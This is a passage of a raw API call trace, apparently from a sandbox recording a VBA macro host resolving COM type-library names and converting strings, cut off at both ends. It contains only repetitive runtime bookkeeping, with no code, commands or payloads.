This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.977] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.977] IUnknown:Release (This=0x665ba50) returned 0xf [0069.977] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.977] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.977] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.977] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x68767a0 [0069.977] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.977] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.977] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.977] IUnknown:Release (This=0x665ba50) returned 0xf [0069.977] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.977] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.977] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.978] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.978] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0069.978] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.978] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.978] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.978] IUnknown:Release (This=0x665ba50) returned 0xf [0069.978] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.978] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.978] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.978] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.978] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.978] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.978] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.978] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.978] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.978] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.978] IUnknown:Release (This=0x665ba50) returned 0xf [0069.978] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.978] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.978] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.978] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.978] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.978] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.979] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.979] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.979] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.979] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.979] IUnknown:Release (This=0x665ba50) returned 0xf [0069.979] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.979] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.979] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.979] IMalloc:Realloc (This=0x7fefec05380, pv=0x396fa0, cb=0x180) returned 0xafc7aa0 [0069.979] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xaa00000 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1ABGA_") returned 8 [0069.980] ITypeComp:RemoteBind (in: This=0x665ba60, szName="L1ABGA_", lHashVal=0x10b439, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1ABGA_") returned 8 [0069.980] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="L1ABGA_", lHashVal=0x10b439, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1ABGA_") returned 8 [0069.980] ITypeComp:RemoteBind (in: This=0x665bd30, szName="L1ABGA_", lHashVal=0x10b439, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L1ABGA_") returned 0x10b439 [0069.980] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="L1ABGA_" | out: _Dst="L1ABGA_") returned 0x0 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="L1ABGA_") returned 8 [0069.980] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.980] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="L1ABGA_", lHashVal=0x10b439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.980] IUnknown:Release (This=0x665ba50) returned 0xf [0069.980] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.980] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="L1ABGA_", lHashVal=0x10b439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.980] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.980] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.980] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="L1ABGA_", lHashVal=0x10b439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.981] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.981] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.981] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="L1ABGA_", lHashVal=0x10b439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.981] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1ABGA_") returned 8 [0069.981] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="L1ABGA_", lHashVal=0x10b439, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.981] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.981] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb24ba | out: _Dst=0x68767a0) returned 0x0 [0069.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_L1ABGA_") returned 0x10b7bd [0069.981] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_L1ABGA_" | out: _Dst="_B_var_L1ABGA_") returned 0x0 [0069.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_L1ABGA_") returned 15 [0069.981] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.981] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_L1ABGA_", lHashVal=0x10b7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.981] IUnknown:Release (This=0x665ba50) returned 0xf [0069.981] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.981] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_L1ABGA_", lHashVal=0x10b7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.981] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.981] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.981] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_L1ABGA_", lHashVal=0x10b7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.981] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.981] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.981] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_L1ABGA_", lHashVal=0x10b7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.981] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.981] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.981] IUnknown:Release (This=0x665ba50) returned 0xf [0069.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1a2e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_L1ABGA_") returned 15 [0069.981] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_L1ABGA_", lHashVal=0x10b7bd, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x47004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x47004200000000, pDummy=0x0) returned 0x0 [0069.982] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb24ba | out: _Dst=0x144ec0) returned 0x0 [0069.982] ITypeComp:RemoteBind (in: This=0x665ba60, szName="VAcZAU", lHashVal=0x1043e2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25aa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VAcZAU") returned 7 [0069.982] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="VAcZAU", lHashVal=0x1043e2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25aa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VAcZAU") returned 7 [0069.982] ITypeComp:RemoteBind (in: This=0x665bd30, szName="VAcZAU", lHashVal=0x1043e2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VAcZAU") returned 0x1043e2 [0069.982] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="VAcZAU" | out: _Dst="VAcZAU") returned 0x0 [0069.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="VAcZAU") returned 7 [0069.982] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.982] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="VAcZAU", lHashVal=0x1043e2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.982] IUnknown:Release (This=0x665ba50) returned 0xf [0069.982] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.982] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="VAcZAU", lHashVal=0x1043e2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.982] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.982] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.982] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="VAcZAU", lHashVal=0x1043e2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.982] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.982] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.982] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="VAcZAU", lHashVal=0x1043e2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.982] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25aa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VAcZAU") returned 7 [0069.983] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="VAcZAU", lHashVal=0x1043e2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.983] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.983] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb25aa | out: _Dst=0x68767a0) returned 0x0 [0069.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_VAcZAU") returned 0x10be8b [0069.983] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_VAcZAU" | out: _Dst="_B_var_VAcZAU") returned 0x0 [0069.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_VAcZAU") returned 14 [0069.983] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.983] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_VAcZAU", lHashVal=0x10be8b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.983] IUnknown:Release (This=0x665ba50) returned 0xf [0069.983] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.983] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_VAcZAU", lHashVal=0x10be8b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.983] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.983] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.983] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_VAcZAU", lHashVal=0x10be8b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.983] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.983] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.983] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_VAcZAU", lHashVal=0x10be8b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.983] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.983] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.983] IUnknown:Release (This=0x665ba50) returned 0xf [0069.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1a5e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_VAcZAU") returned 14 [0069.983] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_VAcZAU", lHashVal=0x10be8b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x41005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x41005a00000000, pDummy=0x0) returned 0x0 [0069.983] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb25aa | out: _Dst=0x144ec0) returned 0x0 [0069.983] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IB_ADAC", lHashVal=0x10c1f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2582, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="IB_ADAC") returned 8 [0069.984] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IB_ADAC", lHashVal=0x10c1f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2582, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="IB_ADAC") returned 8 [0069.984] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IB_ADAC", lHashVal=0x10c1f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.997] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IB_ADAC") returned 0x10c1f1 [0069.997] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="IB_ADAC" | out: _Dst="IB_ADAC") returned 0x0 [0069.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="IB_ADAC") returned 8 [0069.997] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.997] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IB_ADAC", lHashVal=0x10c1f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.997] IUnknown:Release (This=0x665ba50) returned 0xf [0069.997] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.997] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IB_ADAC", lHashVal=0x10c1f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.997] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.997] IUnknown:AddRef (This=0x665bd20) returned 0x7 